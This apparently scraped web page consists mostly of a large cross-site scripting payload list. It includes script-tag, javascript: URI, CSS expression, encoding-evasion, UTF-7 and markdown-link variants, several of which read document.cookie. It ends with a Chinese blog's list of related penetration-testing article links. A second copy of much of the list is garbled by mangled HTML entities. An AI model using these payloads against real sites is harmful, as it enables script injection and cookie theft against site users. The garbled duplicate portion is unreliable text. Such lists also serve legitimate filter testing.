'"></title><script>alert(1783)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="javascript:alert(1784);"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(1785))</SCRIPT><img src="" alt='
"><SCRIPT>alert(1786))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(1787))</SCRIPT><img src="" alt=\'
'); alert(1788); var x='
\\'); alert(1789);var x=\'
//--></SCRIPT><SCRIPT>alert(1790));
>"><ScRiPt%20%0a%0d>alert(1791)%3B</ScRiPt>
<SCRIPT> alert(1792); </SCRIPT>
<BODY ONLOAD=alert(1793)>
<BODY BACKGROUND="javascript:alert(1794)">
<IMG SRC="javascript:alert(1795);">
<IMG DYNSRC="javascript:alert(1796)">
<IMG LOWSRC="javascript:alert(1797)">
<INPUT TYPE="IMAGE" SRC="javascript:alert(1798);">
<LINK REL="stylesheet" HREF="javascript:alert(1799);">
<TABLE BACKGROUND="javascript:alert(1800)">
<TD BACKGROUND="javascript:alert(1801)">
<DIV STYLE="background-image: url(javascript:alert(1802))">
<DIV STYLE="width: expression(alert(1803));">
';alert(1804))//\';alert(1804))//";alert(1804))//\";alert(1804))//--></SCRIPT>">'><SCRIPT>alert(1804))</SCRIPT>
<SCRIPT>alert(1805)</SCRIPT>
<SCRIPT>alert(1806))</SCRIPT>
<BASE HREF="javascript:alert(1807);//">
<BGSOUND SRC="javascript:alert(1808);">
<BODY BACKGROUND="javascript:alert(1809);">
<BODY ONLOAD=alert(1810)>
<DIV STYLE="background-image: url(javascript:alert(1811))">
<DIV STYLE="background-image: url(&#1;javascript:alert(1812))">
<DIV STYLE="width: expression(alert(1813));">
<FRAMESET><FRAME SRC="javascript:alert(1814);"></FRAMESET>
<IFRAME SRC="javascript:alert(1815);"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1816);">
<IMG SRC="javascript:alert(1817);">
<IMG SRC=javascript:alert(1818)>
<IMG DYNSRC="javascript:alert(1819);">
<IMG LOWSRC="javascript:alert(1820);">
<STYLE>li {list-style-image: url("javascript:alert(1821)");}</STYLE><UL><LI>XSS
%BCscript%BEalert(1822)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1823);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1824);">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(1825)></OBJECT>
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert(1826);")"; eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert(1827);</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1828))">
<XSS STYLE="xss:expression(alert(1829))">
<STYLE>.XSS{background-image:url("javascript:alert(1830)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(1831)")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert(1832);">
<TABLE BACKGROUND="javascript:alert(1833)"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert(1834)"></TD></TABLE>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1835);">]]>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(1836)"></B></I></XML>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1837)</SCRIPT>">
<BR SIZE="&{alert(1838)}">
<IMG SRC=JaVaScRiPt:alert(1839)>
<IMG SRC=javascript:alert(1840)>
<IMG SRC=`javascript:alert(1841)`>
<IMG SRC=javascript:alert(1842))>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1843);+ADw-/SCRIPT+AD4-
\";alert(1844);//
</TITLE><SCRIPT>alert(1845);</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert(1846)';</STYLE>
<IMG SRC="jav	ascript:alert(1847);">
<IMG SRC="jav&#x09;ascript:alert(1848);">
<IMG SRC="jav&#x0A;ascript:alert(1849);">
<IMG SRC="jav&#x0D;ascript:alert(1850);">
perl -e 'print "<IMG SRC=java\0script:alert(1851)>";'> out
perl -e 'print "&<SCR\0IPT>alert(1852)</SCR\0IPT>";' > out
<IMG SRC=" &#14; javascript:alert(1853);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1854)>
<IMG SRC="javascript:alert(1855)"
<<SCRIPT>alert(1856);//<</SCRIPT>
<IMG """><SCRIPT>alert(1857)</SCRIPT>">
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1858)>
</script><script>alert(1859)</script>
<scrscriptipt>alert(1861)</scrscriptipt>
<br size=\"&{alert(1862)}\">
perl -e 'print \"<IMG SRC=java\0script:alert(1863)>\";' > out
perl -e 'print \"<SCR\0IPT>alert(1864)</SCR\0IPT>\";' > out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1865))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1866))>
<~/XSS STYLE=xss:expression(alert(1867))>
"><script>alert(1868)</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert(1869))>
XSS/*-*/STYLE=xss:e/**/xpression(alert(1870))>
XSS STYLE=xss:e/**/xpression(alert(1871))>
</XSS STYLE=xss:expression(alert(1872))>
';;alert(1873))//\';;alert(1873))//";;alert(1873))//\";;alert(1873))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(1873))<;/SCRIPT>;
<;SCRIPT>;alert(1874)<;/SCRIPT>;
<;SCRIPT>;alert(1875))<;/SCRIPT>;
<;BASE HREF=";javascript:alert(1876);//";>;
<;BGSOUND SRC=";javascript:alert(1877);";>;
<;BODY BACKGROUND=";javascript:alert(1878);";>;
<;BODY ONLOAD=alert(1879)>;
<;DIV STYLE=";background-image: url(javascript:alert(1880))";>;
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(1881))";>;
<;DIV STYLE=";width: expression(alert(1882));";>;
<;FRAMESET>;<;FRAME SRC=";javascript:alert(1883);";>;<;/FRAMESET>;
<;IFRAME SRC=";javascript:alert(1884);";>;<;/IFRAME>;
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(1885);";>;
<;IMG SRC=";javascript:alert(1886);";>;
<;IMG SRC=javascript:alert(1887)>;
<;IMG DYNSRC=";javascript:alert(1888);";>;
<;IMG LOWSRC=";javascript:alert(1889);";>;
<;STYLE>;li {list-style-image: url(";javascript:alert(1890)";);}<;/STYLE>;<;UL>;<;LI>;XSS
%BCscript%BEalert(1891)%BC/script%BE
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(1892);";>;
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(1893);";>;
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(1894)>;<;/OBJECT>;
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(1895);";)";; eval(a+b+c+d);
<;STYLE TYPE=";text/javascript";>;alert(1896);<;/STYLE>;
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(1897))";>;
<;XSS STYLE=";xss:expression(alert(1898))";>;
<;STYLE>;.XSS{background-image:url(";javascript:alert(1899)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(1900)";)}<;/STYLE>;
<;LINK REL=";stylesheet"; HREF=";javascript:alert(1901);";>;
<;TABLE BACKGROUND=";javascript:alert(1902)";>;<;/TABLE>;
<;TABLE>;<;TD BACKGROUND=";javascript:alert(1903)";>;<;/TD>;<;/TABLE>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(1904);";>;]]>;
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(1905)";>;<;/B>;<;/I>;<;/XML>;
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(1906)<;/SCRIPT>;";>;
<;BR SIZE=";&;{alert(1907)}";>;
<;IMG SRC=JaVaScRiPt:alert(1908)>;
<;IMG SRC=javascript:alert(1909)>;
<;IMG SRC=`javascript:alert(1910)`>;
<;IMG SRC=javascript:alert(1911))>;
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(1912);+ADw-/SCRIPT+AD4-
\";;alert(1913);//
<;/TITLE>;<;SCRIPT>;alert(1914);<;/SCRIPT>;
<;STYLE>;@im\port';\ja\vasc\ript:alert(1915)';;<;/STYLE>;
<;IMG SRC=";jav	ascript:alert(1916);";>;
<;IMG SRC=";jav&;#x09;ascript:alert(1917);";>;
<;IMG SRC=";jav&;#x0A;ascript:alert(1918);";>;
<;IMG SRC=";jav&;#x0D;ascript:alert(1919);";>;
perl -e ';print ";<;IM SRC=java\0script:alert(1920)>";;';>; out
perl -e ';print ";&;<;SCR\0IPT>;alert(1921)<;/SCR\0IPT>;";;'; >; out
<;IMG SRC="; &;#14; javascript:alert(1922);";>;
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(1923)>;
<;IMG SRC=";javascript:alert(1924)";
<;<;SCRIPT>;alert(1925);//<;<;/SCRIPT>;
<;IMG ";";";>;<;SCRIPT>;alert(1926)<;/SCRIPT>;";>;
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(1927)>;
<;/script>;<;script>;alert(1928)<;/script>;
<;scrscriptipt>;alert(1930)<;/scrscriptipt>;
<;br size=\";&;{alert(1931)}\";>;
perl -e 'print \";<;IMG SRC=java\0script:alert(1932)>;\";;' >; out
perl -e 'print \";<;SCR\0IPT>;alert(1933)<;/SCR\0IPT>;\";;' >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1934))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1935))>
<~/XSS STYLE=xss:expression(alert(1936))>
"><script>alert(1937)</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert(1938))>
XSS/*-*/STYLE=xss:e/**/xpression(alert(1939))>
XSS STYLE=xss:e/**/xpression(alert(1940))>
</XSS STYLE=xss:expression(alert(1941))>
>"><script>alert(1942)</script>&
"><STYLE>@import"javascript:alert(1943)";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(1944)>
>%22%27><img%20src%3d%22javascript:alert(1945)%22>
'%uff1cscript%uff1ealert(1946)%uff1c/script%uff1e'
<IMG SRC="javascript:alert(1947);">
<IMG SRC=javascript:alert(1948)>
<IMG SRC=JaVaScRiPt:alert(1949)>
<IMG SRC=JaVaScRiPt:alert(1950)>
<IMG SRC="jav
ascript:alert(1951);">
<IMG SRC="jav
ascript:alert(1952);">
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(1953);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<script>alert(1954)</script>
%3cscript%3ealert(1955)%3c/script%3e
%22%3e%3cscript%3ealert(1956)%3c/script%3e
<IMG SRC="javascript:alert(1957);">
<IMG SRC=javascript:alert(1958)>
<IMG SRC=javascript:alert(1959)>
<img src=xss onerror=alert(1960)>
<IMG """><SCRIPT>alert(1961)</SCRIPT>">
<IMG SRC=javascript:alert(1962))>
<IMG SRC="jav ascript:alert(1963);">
<IMG SRC="jav	ascript:alert(1964);">
<BODY BACKGROUND="javascript:alert(1965)">
<BODY ONLOAD=alert(1966)>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1967);">
<IMG SRC="javascript:alert(1968)"
<<SCRIPT>alert(1969);//<</SCRIPT>
%253cscript%253ealert(1970)%253c/script%253e
"><s"%2b"cript>alert(1971)</script>
foo<script>alert(1972)</script>
<scr<script>ipt>alert(1973)</scr</script>ipt>
';alert(1974))//\';alert(1974))//";alert(1974))//\";alert(1974))//--></SCRIPT>">'><SCRIPT>alert(1974))</SCRIPT>
<marquee onstart='javascript:alert(1975);'>=(◕_◕)=
</span></span><svg onload="alert(1976)//“ #"="">
markdown-xss-payload
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
)\
<javascript:prompt(document.cookie)>
<javascript:alert('XSS')>
\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:alert('XSS'))
\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[clickme](vbscript:alert(document.domain))
_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
<http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
[text](http://danlec.com " [@danlec](/danlec) ")
[a](javascript:this;alert(1))
[a](javascript:this;alert(1))
[a](javascript:this;alert(1))
[a](Javascript:alert(1))
[a](Javas%26%2399;ript:alert(1))
[a](javascript:alert(1))
[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a](javascript:alert(document.domain))
[a](javascript://www.google.com%0Aalert(1))
[a]('javascript:alert("1")')
[a](JaVaScRiPt:alert(1))
![a](https://www.google.com/image.png"onload="alert(1))
![a]("onerror="alert(1))
</http://<?php\><\h1\><script:script>confirm(2)
[XSS](.alert(1);)
[ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]])
[ ](http://a?p=[[/onclick=alert(0) .]])
渗透测试基础-XSS漏洞简析相关推荐
- 渗透测试基础-文件上传漏洞 (下)
渗透测试基础-文件上传漏洞 (下) 第十一题 %00截断绕过 第十二题 %00截断绕过(二) 第十三题 图片马绕过 第十四题 getimagesize图片类型绕过 第十五题 php_exif模块图片类 ...
- 视频教程-Kali Linux渗透测试基础入门到进阶实战全程课-渗透测试
Kali Linux渗透测试基础入门到进阶实战全程课 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥499.00 立即订阅 ...
- 渗透测试基础 - bypass-绕过阻挡我们的WAF(上)
渗透测试基础 - bypass-绕过阻挡我们的WAF(上) 简介(bypass 与 waf) 网站环境准备 常用绕过方法 漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指 ...
- 渗透测试基础 - APP渗透测试(上)
渗透测试基础- APP渗透测试(上) 简介 抓取手机数据包 实战APP渗透测试 漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来.我们一起为了遇见更好的自己而努力
- 渗透测试基础,初识渗透测试
渗透测试基础 1.渗透测试的概念 2.安全术语介绍 3.HTTP协议讲解 概述 HTTP URL HTTP响应头 HTTP头中安全隐患 HTTP请求方法 HTTP响应码 4.HTTPS协议 1.渗透测 ...
- 第一章 内网渗透测试基础
本文章大部分内容来自于 <内网安全攻防:渗透测试实战指南>: https://item.jd.com/12743210.html 0x00 内网基础知识 内网也指局域网(Local Are ...
- NETGEAR 系列路由器命令执行漏洞简析
NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和 ...
- 常见算法基础题思路简析(六)-字符串篇
2019独角兽企业重金招聘Python工程师标准>>> 常见算法基础题思路简析(六)-字符串篇 标签: algorithms [TOC] 本文对和 字符串 有关的常见算法基础题思路分 ...
- 渗透测试工具--Nessue漏洞扫描与分析软件
渗透测试工具–Nessue漏洞扫描与分析软件 一.简介&特色: Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件.总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
目录 前言 一.内网基础知识 1.工作组 2.域 3.活动目录 (1)活动目录的功能 (2)DC和AD区别 4.安全域的划分 (1)DMZ (2)内网 5.域中计算机的分类 6.域内权限 (1)组 ( ...
最新文章
- Python 获取接口数据,解析JSON,写入文件
- php ci hooks,CI框架 -- 核心文件 之 Hooks.php
- C++和服务器交互的几个文件代码
- pc817光耦参数_光耦在电子电路中有什么作用?关键参数有哪些?一起了解一下...
- python 会议室预约系统解决方案_令令开门智能会议室预约系统解决方案
- 《机器学习》二刷超详细笔记| 第一章 绪论
- Java Spring boot 企业微信点餐系统
- 微信JSAPI模式与浏览器类型安全访问
- can接收id过滤linux,linux – 很大程度上被candump(SocketCAN)ID过滤功能搞糊涂了
- 一个动态路由OSPF配置实例(eNSP)
- 推荐16个高清图片网站,可做网站背景
- 实验11 静态路由配置
- 三星s8 android版本,三星S8系列国行获安卓8.0更新 用户泪奔
- 外卖小程序源码java后台_扫码点餐系统小程序源码搭建开发
- 紫微圣人的程序员人生第5回 [原创IT小说]-第五回 一入圣吧深似海,从此亲友变路人
- pybind11学习 | 面向对象编程
- 幸福密码:与原生家庭和解后,才能直面真正的自己
- 谷歌地球out了,谷歌火星来了!
- 微信登陆的LOL只有一个服务器,lol微信登录_lol能用微信登录吗_lol微信登录只有一个区-站长之家...
- 修道士和野人过河问题 A*算法 人工智能